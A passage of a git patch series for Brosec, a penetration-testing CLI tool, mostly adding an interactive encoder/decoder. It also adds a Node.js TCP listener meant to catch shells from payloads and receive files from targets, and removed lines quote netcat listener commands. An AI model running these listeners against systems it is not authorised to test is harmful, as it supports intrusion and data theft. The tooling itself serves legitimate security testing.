From dbeea20cf3dd4c813270e131df8a725dec1a0f00 Mon Sep 17 00:00:00 2001 From: gabemarshall Date: Fri, 15 Jul 2016 09:53:48 -0400 Subject: [PATCH 01/18] Init of encoder feature --- bros | 10 +++- modules/encoder.js | 132 +++++++++++++++++++++++++++++++++++++++++++ modules/utilities.js | 5 ++ 3 files changed, 146 insertions(+), 1 deletion(-) create mode 100644 modules/encoder.js diff --git a/bros b/bros index 644de67..584ee77 100755 --- a/bros +++ b/bros @@ -42,7 +42,7 @@ function getFirstArgValue(arg) { } function parseArgs() { - + var oldSecondary; if (firstArgument >= 1 && firstArgument <= 6) { secondaryMenu = getFirstArgValue(firstArgument); @@ -75,6 +75,7 @@ function parseArgs() { } else if (typeof(firstArgument) === "string") { firstArgument = firstArgument.toUpperCase(); try { + oldSecondary = secondArgument; secondArgument = secondArgument.toUpperCase(); } catch(err){ @@ -92,6 +93,13 @@ function parseArgs() { //simpleFtp.ftps(argv); } else if (firstArgument === "UPDATE"){ utilities.update(); + } else if (firstArgument === "ENCODE"){ + if (secondArgument){ + utilities.encoder(oldSecondary); + } else { + utilities.encoder(); + } + } else if (firstArgument+" "+secondArgument === "SET LHOST" && !thirdArgument){ interfaces.setlhost(); diff --git a/modules/encoder.js b/modules/encoder.js new file mode 100644 index 0000000..8139ec0 --- /dev/null +++ b/modules/encoder.js @@ -0,0 +1,132 @@ +var blessed = require("blessed"), + output = require('./output'), + outputValue = ''; +var screen = blessed.screen({ + smartCSR: true +}); +screen.title = 'Brosec Encoder'; +exports.init = function(input){ + + // box at bottom for chat input + inputBox = blessed.textbox({ + parent: screen, + height: '15%', + label: '[ Input ]', + + border: { + type: 'line', fg: "#27ea09" + }, + width: '80%', + top: 'center', + left: 'center', + }); + + var box = blessed.box({ + parent: screen, + top: '20%', + width: '80%', + left: 'center', + autoPadding: true, + label: '[ Output ]', + height: '15%', + content: "", + tags: true, + border: { + type: 'line', fg: "#27ea09" + } + }); + + screen.append(box); + + setTimeout(function(){ + inputBox.focus(); + screen.render(); + if(input){ + inputBox.setContent(input); + } + setInterval(function(){ + outputValue = encodeURIComponent(inputBox.getContent()); + box.setContent(outputValue); + screen.title = 'hello' + screen.render(); + }, 5) + }, 100) + + screen.render(); + + inputBox.focus(); + + + var inputBoxFocusHandler = function() { + + inputBox.readInput(function(data) { + + }); + inputBox.key('C-c', function(){ + return process.exit(0); + }) + inputBox.key('enter', function(ch, key) { + + + + + + + var command = inputBox.getValue(); + + box.hide(); + inputBox.hide(); + screen.destroy(); + //outputBox.addItem(command); + output.cmd(outputValue); + + setTimeout(function(){ + return process.exit(0); + }, 50) + //return process.exit(0); + + inputBox.unkey('enter'); + screen.render(); + + inputBoxFocusHandler(); + }); + + inputBox.key('tab', function(ch, key) { + inputBox.unkey('enter'); + }); + }; + inputBox.on('focus', inputBoxFocusHandler); + + + + + + + + + setTimeout(function(){ + //inputBox.focus(); + //shells.getSessionsForBox(); + screen.render(); + + }, 50) + + + screen.key('tab', function(ch, key) { + if (inputBox.focused) { + box.focus(); + } else { + inputBox.focus(); + } + + screen.render(); + }); + + + screen.key(['escape', 'q', 'C-c'], function(ch, key) { + return process.exit(0); + }); + +} + + diff --git a/modules/utilities.js b/modules/utilities.js index 6d4f81f..b951072 100644 --- a/modules/utilities.js +++ b/modules/utilities.js @@ -1,5 +1,6 @@ var child_process = require('child_process'), log = require('./log.js'), + encoder = require('./encoder'), brosDir = require.resolve('cli-color'); // Get install path @@ -24,3 +25,7 @@ exports.update = function(){ }) } + +exports.encoder = function(input){ + encoder.init(input); +} \ No newline at end of file From 06222a671759d55e3bbe348c6f64c16eb6420a80 Mon Sep 17 00:00:00 2001 From: gabemarshall Date: Sat, 23 Jul 2016 15:03:20 -0400 Subject: [PATCH 02/18] Removed kexec dependency, updated documentation --- CHANGELOG.md | 8 ++++++++ README.md | 4 +++- modules/checkModule.js | 8 -------- modules/encoder.js | 18 +++++++++-------- modules/nc.js | 45 +++++++++++++++++++++++++++++++++++++++++ modules/questionUser.js | 41 +++++++++---------------------------- package.json | 9 +++------ 7 files changed, 79 insertions(+), 54 deletions(-) delete mode 100644 modules/checkModule.js create mode 100644 modules/nc.js diff --git a/CHANGELOG.md b/CHANGELOG.md index 7fca998..a5f5ab8 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -1,5 +1,13 @@ # ChangeLog +## 1.1.0a _(July 23, 2016)_ + +- Dependencies + - Removed kexec dependency that was used to run netcat listeners (replaced by ```modules/nc.js```) + + +- Bug fixes + ## 0.2b _(Feb 16, 2016)_ - Features diff --git a/README.md b/README.md index ea58de7..51f1197 100644 --- a/README.md +++ b/README.md @@ -73,8 +73,10 @@ Installation #### Kali Linux - `apt-get install npm build-essential g++ xsel netcat` Install dependencies -- `npm config set registry http://registry.npmjs.org/` Npm registry seems to be broken by default when installed from Kali repos - `npm install -g n` Install n (nodejs version manager) + - If the above fails, try - `npm config set registry http://registry.npmjs.org/` + + - `n latest` Install latest version of nodejs - `git clone https://github.com/gabemarshall/Brosec.git` - Clone Brosec repo - `cd Brosec && npm install` - cd into the directory and install npm depdendencies diff --git a/modules/checkModule.js b/modules/checkModule.js deleted file mode 100644 index 7ddf620..0000000 --- a/modules/checkModule.js +++ /dev/null @@ -1,8 +0,0 @@ -exports.kexec = function(){ - try { - var kexec = require('kexec'); - return true - } catch (err){ - return false; - } -} diff --git a/modules/encoder.js b/modules/encoder.js index 8139ec0..5d66422 100644 --- a/modules/encoder.js +++ b/modules/encoder.js @@ -1,12 +1,13 @@ var blessed = require("blessed"), output = require('./output'), outputValue = ''; -var screen = blessed.screen({ - smartCSR: true -}); -screen.title = 'Brosec Encoder'; -exports.init = function(input){ + +exports.init = function(input){ + var screen = blessed.screen({ + smartCSR: true + }); + process.title = 'Brosec Encoder'; // box at bottom for chat input inputBox = blessed.textbox({ parent: screen, @@ -17,6 +18,7 @@ exports.init = function(input){ type: 'line', fg: "#27ea09" }, width: '80%', + content: '', top: 'center', left: 'center', }); @@ -29,7 +31,7 @@ exports.init = function(input){ autoPadding: true, label: '[ Output ]', height: '15%', - content: "", + content: '', tags: true, border: { type: 'line', fg: "#27ea09" @@ -59,8 +61,8 @@ exports.init = function(input){ var inputBoxFocusHandler = function() { - inputBox.readInput(function(data) { - + inputBox.readInput("foo", "bar", function(data) { + console.log(data); }); inputBox.key('C-c', function(){ return process.exit(0); diff --git a/modules/nc.js b/modules/nc.js new file mode 100644 index 0000000..9ce0e64 --- /dev/null +++ b/modules/nc.js @@ -0,0 +1,45 @@ +var net = require('net'), + fs = require('fs'); + +exports.listen = function(port){ + var server = net.createServer({maxConnections: 1},function (socket) { + process.stdin.resume(); + process.stdin.setEncoding('utf8'); + + process.stdin.on('data', function(chunk) { + socket.write(chunk); + }); + + socket.on('data', function (data) { + process.stdout.write(data); + }); + + socket.on('end', function () { + process.exit(1); + }); + }).listen(port, '0.0.0.0'); + server.maxConnections = 1; +} + +exports.receiveFile = function(port, path, file){ + + var server = net.createServer({maxConnections: 1},function (socket) { + + var wstream = fs.createWriteStream(path+file); + socket.on('data', function (data) { + wstream.write(data); + }); + + socket.on('end', function () { + wstream.end(); + }); + + wstream.on('finish', function () { + + console.log('[+] File successfully saved to '+path+file); + process.exit(1); + }); +}).listen(port, '0.0.0.0'); + +server.maxConnections = 1; +} diff --git a/modules/questionUser.js b/modules/questionUser.js index 6b5c145..182d3d6 100644 --- a/modules/questionUser.js +++ b/modules/questionUser.js @@ -5,13 +5,9 @@ var prompt = require('prompt'), settings = require('../settings.js'), db = require('../db/db'), currentOS = os.type(), - checkModule = require('./checkModule.js'), + netcat = require('./nc'), finalAnswer -if (checkModule.kexec()) { - var kexec = require('kexec'); -} - exports.http = function(callback) { prompt.message = "Should I fire up a web server for you? (Y/n) :" @@ -36,8 +32,8 @@ exports.http = function(callback) { exports.ncat = function(callback) { var port = db.getConfig("LPORT") - if (kexec){ - prompt.message = "Should I start a netcat listener for you? (Y/n) :" + + prompt.message = "Should I start a tcp listener on port "+port+" for you? (Y/n) :" prompt.get([{ name: '_', description: ":" @@ -46,9 +42,9 @@ exports.ncat = function(callback) { try { result._ = result._.toUpperCase() if (result._ === "Y" || !result._) { - console.log(log.blackBright("\n[*] Initializing hacking sequence (" + settings.netcat + " -lnp " + port + " -vv)")); callback(finalAnswer); - kexec(settings.netcat + " -lnp " + port + " -vv"); + console.log(log.blackBright("\n[*] TCP socket server listening on port " + port)); + netcat.listen(port); } else { callback(finalAnswer); } @@ -57,20 +53,15 @@ exports.ncat = function(callback) { } }) - } else { - console.log(""); - console.log(log.blackBright("[*] To start a netcat listener, run the following => " + settings.netcat + " -lnp " + port + " -vv")); - callback(finalAnswer); - } + } exports.ncatReceiveFile = function(callback) { var port = db.getConfig("LPORT"); - var path = db.getConfig("PATH"); + var path = process.cwd()+"/"; var localFile = finalAnswer.replace(/(\/)/g, "_") - if (!kexec){ - prompt.message = "Should I start a netcat listener for you? (Y/n) :" + prompt.message = "Should I start a tcp listener on port "+port+" for you? (Y/n) :" prompt.get([{ name: '_', description: ":" @@ -80,17 +71,10 @@ exports.ncatReceiveFile = function(callback) { result._ = result._.toUpperCase() if (result._ === "Y" || !result._) { - - if (!path || path.length <= 0) { - log.yellow("Warning: Path variable is not set, defaulting to /var/tmp/") - } - path = "/var/tmp/" - - // if kexec isn't installed, notify the user callback(finalAnswer); + console.log(log.blackBright("\n[*] TCP socket server listening on port " + port + " (File will be saved as "+path+localFile+")\n")); - console.log(log.blackBright("\n[*] Initializing hacking sequence (File will be saved as " + path + "/bros" + localFile + ")\n")) - kexec(settings.netcat + " -lnp " + port + " > " + path + "/bros" + localFile + " -vv"); + netcat.receiveFile(port, path, localFile); } else { callback(finalAnswer); @@ -100,11 +84,6 @@ exports.ncatReceiveFile = function(callback) { } }) - } else { - callback(finalAnswer); - console.log(""); - console.log(log.blackBright("[*] To start a netcat listener, run the following => " + settings.netcat + " -lnp " + port + " > " + path + "/bros" + localFile)); - } } exports.some = function(question, callback, type) { diff --git a/package.json b/package.json index fae406f..29f0185 100644 --- a/package.json +++ b/package.json @@ -1,6 +1,6 @@ { "name": "Brosec", - "version": "0.0.1a", + "version": "1.1.0", "description": "Brosec - Pentest fu for bros", "main": "bros.js", "repository": { @@ -16,7 +16,6 @@ "dirty": "*", "ejs": "^2.3.1", "express": "*", - "kexec": "^2.0.2", "morgan": "*", "mstring": "*", "prompt": "*", @@ -25,10 +24,8 @@ "method-override": "*", "ecstatic": "*", "simple-git": "*", - "ftpd": "*" - }, - "optionalDependencies":{ - "kexec":"^2.0.2" + "ftpd": "*", + "blessed": "*" }, "author": "Gabe Marshall", "license": "ISC" From 83d59aa0c3472514400f45f76c8d6f2f89b855b6 Mon Sep 17 00:00:00 2001 From: gabemarshall Date: Sat, 23 Jul 2016 15:03:57 -0400 Subject: [PATCH 03/18] Updates to README to reflect no longer needing kexec or netcat --- README.md | 9 +++------ 1 file changed, 3 insertions(+), 6 deletions(-) diff --git a/README.md b/README.md index 51f1197..6136595 100644 --- a/README.md +++ b/README.md @@ -66,13 +66,13 @@ Installation #### Mac -- `brew install node netcat` - Install Nodejs and netcat (nc or ncat will work too) +- `brew install node` - Install Nodejs - `git clone https://github.com/gabemarshall/Brosec.git` - Clone Brosec repo - `cd Brosec && npm install` - cd into the directory and install npm depdendencies #### Kali Linux -- `apt-get install npm build-essential g++ xsel netcat` Install dependencies +- `apt-get install npm build-essential g++ xsel` Install dependencies - `npm install -g n` Install n (nodejs version manager) - If the above fails, try - `npm config set registry http://registry.npmjs.org/` @@ -84,11 +84,8 @@ Installation ### Windows (Unsupported) - Install [nodejs](https://nodejs.org/download) -- Install [ncat](https://nmap.org/download.html) - `git clone https://github.com/gabemarshall/Brosec.git` - Clone Brosec repo -Payloads that utilize netcat will not work due to the kexec library not being supported in Windows - #### Optional Add bros directory path to your PATH env variable, create a symlink for the bros file, etc @@ -96,7 +93,7 @@ Add bros directory path to your PATH env variable, create a symlink for the bros Configuration ===================== -Brosec stores configuration values in a local json db file. The default storage location is /var/tmp, but can be changed by editing settings.dbPath variable in the settings.js file. Brosec also uses netcat for several payloads. If needed, the path to netcat can be altered via the settings.netcat variable (it can also be changed to ncat or nc). +Brosec stores configuration values in a local json db file. The default storage location is /var/tmp, but can be changed by editing settings.dbPath variable in the settings.js file. Swag From 472034fc4acc12f6d427e13028513294cc78e8f8 Mon Sep 17 00:00:00 2001 From: gabemarshall Date: Mon, 25 Jul 2016 10:47:52 -0400 Subject: [PATCH 04/18] Initial working version of bros encode --- modules/encoder.js | 345 ++++++++++++++++++++++++++++----------------- package.json | 3 +- 2 files changed, 218 insertions(+), 130 deletions(-) diff --git a/modules/encoder.js b/modules/encoder.js index 5d66422..8e4589c 100644 --- a/modules/encoder.js +++ b/modules/encoder.js @@ -1,134 +1,221 @@ var blessed = require("blessed"), - output = require('./output'), - outputValue = ''; - - -exports.init = function(input){ - var screen = blessed.screen({ - smartCSR: true - }); - process.title = 'Brosec Encoder'; - // box at bottom for chat input - inputBox = blessed.textbox({ - parent: screen, - height: '15%', - label: '[ Input ]', - - border: { - type: 'line', fg: "#27ea09" - }, - width: '80%', - content: '', - top: 'center', - left: 'center', - }); - - var box = blessed.box({ - parent: screen, - top: '20%', - width: '80%', - left: 'center', - autoPadding: true, - label: '[ Output ]', - height: '15%', - content: '', - tags: true, - border: { - type: 'line', fg: "#27ea09" - } - }); - - screen.append(box); - - setTimeout(function(){ - inputBox.focus(); - screen.render(); - if(input){ - inputBox.setContent(input); - } - setInterval(function(){ - outputValue = encodeURIComponent(inputBox.getContent()); - box.setContent(outputValue); - screen.title = 'hello' - screen.render(); - }, 5) - }, 100) - - screen.render(); - - inputBox.focus(); - - - var inputBoxFocusHandler = function() { - - inputBox.readInput("foo", "bar", function(data) { - console.log(data); - }); - inputBox.key('C-c', function(){ - return process.exit(0); - }) - inputBox.key('enter', function(ch, key) { - - - - - - - var command = inputBox.getValue(); - - box.hide(); - inputBox.hide(); - screen.destroy(); - //outputBox.addItem(command); - output.cmd(outputValue); - - setTimeout(function(){ - return process.exit(0); - }, 50) - //return process.exit(0); - - inputBox.unkey('enter'); - screen.render(); - - inputBoxFocusHandler(); - }); - - inputBox.key('tab', function(ch, key) { - inputBox.unkey('enter'); - }); - }; - inputBox.on('focus', inputBoxFocusHandler); - - - - - - - - - setTimeout(function(){ - //inputBox.focus(); - //shells.getSessionsForBox(); - screen.render(); - - }, 50) - - - screen.key('tab', function(ch, key) { - if (inputBox.focused) { - box.focus(); - } else { - inputBox.focus(); - } - - screen.render(); - }); - + output = require('./output'), + htmlEncode = require('js-htmlencode').htmlEncode, + htmlDecode = require('js-htmlencode').htmlDecode, + outputValue = '', + counter = 0; + +var method = 'ENC', + methodTitle = 'Encoding'; + +var modes = [{ + 'DEC': function(data) { + try {return decodeURIComponent(data)}catch(err){ + return data; + } + }, + 'ENC': function(data) { + return encodeURIComponent(data) + }, + 'title': 'URL' +}, { + 'DEC': function(data) { + try {return htmlDecode(data)}catch(err){return data;} + }, + 'ENC': function(data) { + try {return htmlEncode(data)}catch(err){return data;} + }, + 'title': 'HTML' +}, { + 'DEC': function(data) { + try{return new Buffer(data, 'base64').toString('ascii')}catch(err){return data;} + }, + 'ENC': function(data) { + try{return new Buffer(data).toString('base64');}catch(err){return data;} + }, + 'title': 'Base64' +}] + +function setTitle(title, mode) { + //console.log(mode); + var instructions = "\n\nChange (E)ncoding: " + log.blackBright("Ctrl + e") + "\n(A)pply to input: " + log.blackBright("Ctrl + a") + " \n(T)oggle Mode: " + log.blackBright("Ctrl + t") + "\n\nPress " + log.blackBright("return") + " to exit."; + var broTitle = "\nCurrent Mode: " + log.blackBright(mode) + " \nCurrent Encoding: " + log.blackBright(title) + instructions; + return broTitle; +} +var modeTitle = setTitle(modes[counter]['title'], methodTitle); +var encode = modes[0][method]; + +function toggleMode() { + if (method === 'ENC') { + method = 'DEC'; + encode = modes[counter][method]; + methodTitle = 'Decoding'; + modeTitle = setTitle(modes[counter]['title'], methodTitle); + } else { + method = 'ENC'; + encode = modes[counter][method]; + methodTitle = 'Encoding'; + modeTitle = setTitle(modes[counter]['title'], methodTitle); + } +} - screen.key(['escape', 'q', 'C-c'], function(ch, key) { - return process.exit(0); - }); +function toggleEncoding() { + if (counter < (modes.length - 1)) { + counter += 1; + } else { + counter = 0; + } + encode = modes[counter]['ENC']; + modeTitle = setTitle(modes[counter]['title'], methodTitle); } - +exports.init = function(input) { + var screen = blessed.screen({ + smartCSR: true + }); + + var inputBox = blessed.textbox({ + parent: screen, + height: '15%', + label: '[ Input ]', + inputOnFocus: true, + border: { + type: 'line', + fg: "#27ea09" + }, + width: '80%', + content: '', + top: '65%', + left: 'center', + }); + + var list = blessed.box({ + parent: inputBox, + height: '45%', + align: 'center', + width: '80%', + style: { + fg: 'green' + }, + top: '12%', + // border: { + // type: 'bg', + // ch: '_', + // fg: "#27ea09" + // }, + left: 'center', + }) + screen.append(list); + var box = blessed.box({ + parent: screen, + top: '45%', + width: '80%', + left: 'center', + autoPadding: true, + label: '[ Output ]', + height: '15%', + content: '', + tags: true, + border: { + type: 'line', + fg: "#27ea09" + } + }); + + screen.append(box); + + setTimeout(function() { + inputBox.focus(); + screen.render(); + if (input) { + inputBox.setValue(input); + } + setInterval(function() { + outputValue = encode(inputBox.getContent()); + box.setContent(outputValue); + list.setContent(modeTitle); + screen.render(); + }, 5) + }, 100) + + screen.render(); + + inputBox.focus(); + + function eHandler() { + this.init = inputBox.onceKey('C-e', function(ch, key) { + inputBox.unkey('C-e'); + + setTimeout(function() { + toggleEncoding(); + eHandler(); + }, 100) + }) + } + + function tHandler() { + this.init = inputBox.onceKey('C-t', function(ch, key) { + inputBox.unkey('C-t'); + setTimeout(function() { + toggleMode(); + tHandler(); + }, 100) + }) + } + var inputBoxFocusHandler = function() { + + inputBox.key('C-c', function() { + return process.exit(0); + }) + + eHandler(); + + tHandler(); + + inputBox.key('C-a', function(ch, key) { + inputBox.setValue(outputValue); + }) + + inputBox.key('enter', function(ch, key) { + + var command = inputBox.getValue(); + + box.hide(); + inputBox.hide(); + screen.destroy(); + + setTimeout(function() { + output.cmd(outputValue); + return process.exit(0); + }, 50) + + inputBox.unkey('enter'); + screen.render(); + + inputBoxFocusHandler(); + }); + + }; + inputBox.on('focus', inputBoxFocusHandler); + + setTimeout(function() { + screen.render(); + }, 50) + + + screen.key('tab', function(ch, key) { + if (inputBox.focused) { + list.focus(); + } else { + inputBox.focus(); + } + + screen.render(); + }); + + + screen.key(['escape', 'q', 'C-c'], function(ch, key) { + return process.exit(0); + }); +} diff --git a/package.json b/package.json index 29f0185..5a42b61 100644 --- a/package.json +++ b/package.json @@ -25,7 +25,8 @@ "ecstatic": "*", "simple-git": "*", "ftpd": "*", - "blessed": "*" + "blessed": "*", + "js-htmlencode": "*" }, "author": "Gabe Marshall", "license": "ISC" From 0eb53d609232388e7aaf39e379324dd9b18a2f97 Mon Sep 17 00:00:00 2001 From: gabemarshall Date: Mon, 25 Jul 2016 13:43:41 -0400 Subject: [PATCH 05/18] Updates to encoder --- modules/encoder.js | 17 +++++++++++++++-- 1 file changed, 15 insertions(+), 2 deletions(-) diff --git a/modules/encoder.js b/modules/encoder.js index 8e4589c..45cd985 100644 --- a/modules/encoder.js +++ b/modules/encoder.js @@ -34,11 +34,24 @@ var modes = [{ try{return new Buffer(data).toString('base64');}catch(err){return data;} }, 'title': 'Base64' +}, +{ + 'DEC': function(data) { + try{return new Buffer(data, 'hex').toString('ascii')}catch(err){return data;} + }, + 'ENC': function(data) { + try{return new Buffer(data).toString('hex');}catch(err){return data;} + }, + 'title': 'Hex' }] function setTitle(title, mode) { //console.log(mode); - var instructions = "\n\nChange (E)ncoding: " + log.blackBright("Ctrl + e") + "\n(A)pply to input: " + log.blackBright("Ctrl + a") + " \n(T)oggle Mode: " + log.blackBright("Ctrl + t") + "\n\nPress " + log.blackBright("return") + " to exit."; + var e = log.cyanBright("e"); + var a = log.cyanBright("a"); + var t = log.cyanBright("t"); + var ret = log.cyanBright("return"); + var instructions = "\n\nChange (E)ncoding: " + log.blackBright("Ctrl + "+e+"") + "\n(A)pply to input: " + log.blackBright("Ctrl + "+a) + " \n(T)oggle Mode: " + log.blackBright("Ctrl + "+t) + "\n\nPress " + ret + " to exit."; var broTitle = "\nCurrent Mode: " + log.blackBright(mode) + " \nCurrent Encoding: " + log.blackBright(title) + instructions; return broTitle; } @@ -71,6 +84,7 @@ function toggleEncoding() { } exports.init = function(input) { + var screen = blessed.screen({ smartCSR: true }); @@ -203,7 +217,6 @@ exports.init = function(input) { screen.render(); }, 50) - screen.key('tab', function(ch, key) { if (inputBox.focused) { list.focus(); From 42edc3cca5ad0bf4520a559e6809b6e6d475eb1a Mon Sep 17 00:00:00 2001 From: gabemarshall Date: Mon, 25 Jul 2016 15:51:57 -0400 Subject: [PATCH 06/18] Bug fixes --- modules/encoder.js | 26 ++++++++++++++++++++------ 1 file changed, 20 insertions(+), 6 deletions(-) diff --git a/modules/encoder.js b/modules/encoder.js index 45cd985..bcffe75 100644 --- a/modules/encoder.js +++ b/modules/encoder.js @@ -3,7 +3,9 @@ var blessed = require("blessed"), htmlEncode = require('js-htmlencode').htmlEncode, htmlDecode = require('js-htmlencode').htmlDecode, outputValue = '', - counter = 0; + justatest = '', + counter = 0, + keychanged = false; var method = 'ENC', methodTitle = 'Encoding'; @@ -146,12 +148,17 @@ exports.init = function(input) { inputBox.setValue(input); } setInterval(function() { - outputValue = encode(inputBox.getContent()); - box.setContent(outputValue); - list.setContent(modeTitle); - screen.render(); + if(keychanged){ + outputValue = encode(inputBox.getContent()); + justatest = outputValue; + box.setContent(outputValue); + list.setContent(modeTitle); + screen.render(); + } }, 5) - }, 100) + list.setContent(modeTitle); + screen.render(); + }, 50) screen.render(); @@ -182,6 +189,13 @@ exports.init = function(input) { inputBox.key('C-c', function() { return process.exit(0); }) + inputBox.on('keypress', function(){ + outputValue = encode(inputBox.getContent()); + keychanged = true; + setTimeout(function(){ + keychanged = false; + }, 75) + }) eHandler(); From ab720b7dca9de56935ad360219450917a91fdc8d Mon Sep 17 00:00:00 2001 From: gabemarshall Date: Mon, 25 Jul 2016 20:36:15 -0400 Subject: [PATCH 07/18] Fixed bug that was causing long payloads to break --- modules/encoder.js | 19 ++++++++++++------- 1 file changed, 12 insertions(+), 7 deletions(-) diff --git a/modules/encoder.js b/modules/encoder.js index bcffe75..bcb1709 100644 --- a/modules/encoder.js +++ b/modules/encoder.js @@ -17,7 +17,11 @@ var modes = [{ } }, 'ENC': function(data) { - return encodeURIComponent(data) + if (keychanged){ + keychanged = false; + var a = encodeURIComponent(data); + return encodeURIComponent(data); + } }, 'title': 'URL' }, { @@ -128,6 +132,7 @@ exports.init = function(input) { top: '45%', width: '80%', left: 'center', + scrollable: true, autoPadding: true, label: '[ Output ]', height: '15%', @@ -190,11 +195,10 @@ exports.init = function(input) { return process.exit(0); }) inputBox.on('keypress', function(){ - outputValue = encode(inputBox.getContent()); - keychanged = true; - setTimeout(function(){ - keychanged = false; - }, 75) + if (!keychanged){ + outputValue = encode(inputBox.getContent()); + keychanged = true; + } }) eHandler(); @@ -208,7 +212,8 @@ exports.init = function(input) { inputBox.key('enter', function(ch, key) { var command = inputBox.getValue(); - + keychanged = true; + outputValue = encode(inputBox.getValue()); box.hide(); inputBox.hide(); screen.destroy(); From f37bf8ee01bd49601a9cd0c47a7a8d63cd898485 Mon Sep 17 00:00:00 2001 From: gabemarshall Date: Tue, 26 Jul 2016 16:22:29 -0400 Subject: [PATCH 08/18] Performance improvements to encoder module --- modules/encoder.js | 167 ++++++++++++++++++++++++---------------- modules/output.js | 41 +++------- modules/questionUser.js | 11 ++- package.json | 3 +- 4 files changed, 123 insertions(+), 99 deletions(-) diff --git a/modules/encoder.js b/modules/encoder.js index bcb1709..883328e 100644 --- a/modules/encoder.js +++ b/modules/encoder.js @@ -12,41 +12,74 @@ var method = 'ENC', var modes = [{ 'DEC': function(data) { - try {return decodeURIComponent(data)}catch(err){ - return data; - } + try { + keychanged = false; + return decodeURIComponent(data) + } catch (err) { + return data; + } }, 'ENC': function(data) { - if (keychanged){ - keychanged = false; - var a = encodeURIComponent(data); - return encodeURIComponent(data); - } + keychanged = false; + return encodeURIComponent(data); }, 'title': 'URL' }, { 'DEC': function(data) { - try {return htmlDecode(data)}catch(err){return data;} + try { + return htmlDecode(data) + } catch (err) { + return data; + } }, 'ENC': function(data) { - try {return htmlEncode(data)}catch(err){return data;} + try { + keychanged = false; + return htmlEncode(data); + + } catch (err) { + console.log(err); + return data; + } }, 'title': 'HTML' }, { 'DEC': function(data) { - try{return new Buffer(data, 'base64').toString('ascii')}catch(err){return data;} + try { + + keychanged = false; + return new Buffer(data, 'base64').toString(); + } catch (err) { + + return data; + } }, 'ENC': function(data) { - try{return new Buffer(data).toString('base64');}catch(err){return data;} + try { + + keychanged = false; + return new Buffer(data).toString('base64'); + } catch (err) { + return data; + } }, 'title': 'Base64' -}, -{ +}, { 'DEC': function(data) { - try{return new Buffer(data, 'hex').toString('ascii')}catch(err){return data;} + try { + keychanged = false; + return new Buffer(data, 'hex').toString('ascii') + } catch (err) { + return data; + } }, 'ENC': function(data) { - try{return new Buffer(data).toString('hex');}catch(err){return data;} + try { + keychanged = false; + return new Buffer(data).toString('hex'); + } catch (err) { + return data; + } }, 'title': 'Hex' }] @@ -57,38 +90,13 @@ function setTitle(title, mode) { var a = log.cyanBright("a"); var t = log.cyanBright("t"); var ret = log.cyanBright("return"); - var instructions = "\n\nChange (E)ncoding: " + log.blackBright("Ctrl + "+e+"") + "\n(A)pply to input: " + log.blackBright("Ctrl + "+a) + " \n(T)oggle Mode: " + log.blackBright("Ctrl + "+t) + "\n\nPress " + ret + " to exit."; + var instructions = "\n\nChange (E)ncoding: " + log.blackBright("Ctrl + " + e + "") + "\n(A)pply to input: " + log.blackBright("Ctrl + " + a) + " \n(T)oggle Mode: " + log.blackBright("Ctrl + " + t) + "\n\nPress " + ret + " to exit."; var broTitle = "\nCurrent Mode: " + log.blackBright(mode) + " \nCurrent Encoding: " + log.blackBright(title) + instructions; return broTitle; } var modeTitle = setTitle(modes[counter]['title'], methodTitle); var encode = modes[0][method]; -function toggleMode() { - if (method === 'ENC') { - method = 'DEC'; - encode = modes[counter][method]; - methodTitle = 'Decoding'; - modeTitle = setTitle(modes[counter]['title'], methodTitle); - } else { - method = 'ENC'; - encode = modes[counter][method]; - methodTitle = 'Encoding'; - modeTitle = setTitle(modes[counter]['title'], methodTitle); - } -} - -function toggleEncoding() { - if (counter < (modes.length - 1)) { - counter += 1; - } else { - counter = 0; - } - encode = modes[counter]['ENC']; - modeTitle = setTitle(modes[counter]['title'], methodTitle); - -} - exports.init = function(input) { var screen = blessed.screen({ @@ -118,7 +126,7 @@ exports.init = function(input) { style: { fg: 'green' }, - top: '12%', + top: '12%', // border: { // type: 'bg', // ch: '_', @@ -150,43 +158,71 @@ exports.init = function(input) { inputBox.focus(); screen.render(); if (input) { + keychanged = true; inputBox.setValue(input); } setInterval(function() { - if(keychanged){ - outputValue = encode(inputBox.getContent()); - justatest = outputValue; - box.setContent(outputValue); - list.setContent(modeTitle); - screen.render(); + if (keychanged) { + outputValue = encode(inputBox.getContent()); + box.setContent(outputValue); } + list.setContent(modeTitle); + screen.render(); }, 5) + list.setContent(modeTitle); - screen.render(); }, 50) screen.render(); + function refreshScreen() { + outputValue = encode(inputBox.getContent()); + box.setContent(outputValue); + list.setContent(modeTitle); + screen.render(); + } + + function toggleEncoding() { + if (counter < (modes.length - 1)) { + counter += 1; + } else { + counter = 0; + } + encode = modes[counter][method]; + modeTitle = setTitle(modes[counter]['title'], methodTitle); + refreshScreen(); + } + function toggleMode() { + if (method === 'ENC') { + method = 'DEC'; + encode = modes[counter][method]; + methodTitle = 'Decoding'; + modeTitle = setTitle(modes[counter]['title'], methodTitle); + } else { + method = 'ENC'; + encode = modes[counter][method]; + methodTitle = 'Encoding'; + modeTitle = setTitle(modes[counter]['title'], methodTitle); + } + refreshScreen(); + } inputBox.focus(); function eHandler() { this.init = inputBox.onceKey('C-e', function(ch, key) { inputBox.unkey('C-e'); - - setTimeout(function() { - toggleEncoding(); - eHandler(); - }, 100) + keypress = true; + toggleEncoding(); + eHandler(); }) } function tHandler() { this.init = inputBox.onceKey('C-t', function(ch, key) { inputBox.unkey('C-t'); - setTimeout(function() { - toggleMode(); - tHandler(); - }, 100) + keypress = true; + toggleMode(); + tHandler(); }) } var inputBoxFocusHandler = function() { @@ -194,11 +230,11 @@ exports.init = function(input) { inputBox.key('C-c', function() { return process.exit(0); }) - inputBox.on('keypress', function(){ - if (!keychanged){ - outputValue = encode(inputBox.getContent()); - keychanged = true; - } + inputBox.on('keypress', function() { + if (!keychanged) { + refreshScreen(); + keychanged = true; + } }) eHandler(); @@ -207,6 +243,8 @@ exports.init = function(input) { inputBox.key('C-a', function(ch, key) { inputBox.setValue(outputValue); + keychanged = true; + outputValue = encode(inputBox.getContent()); }) inputBox.key('enter', function(ch, key) { @@ -220,7 +258,6 @@ exports.init = function(input) { setTimeout(function() { output.cmd(outputValue); - return process.exit(0); }, 50) inputBox.unkey('enter'); diff --git a/modules/output.js b/modules/output.js index 1073a08..af81bf4 100644 --- a/modules/output.js +++ b/modules/output.js @@ -3,42 +3,21 @@ var exec = require('child_process').exec; var log = require('cli-color'); var os = require('os'); var menu = require('./menu'); +var ncp = require("copy-paste"); var red = log.red var warn = function(){ - console.log(red("\nError: Missing required variable. See \"help\" for more information.")) - menu.mainMenu() + setTimeout(function(){ + console.log(red("\nError: Missing required variable. See \"help\" for more information.")); + },50) } 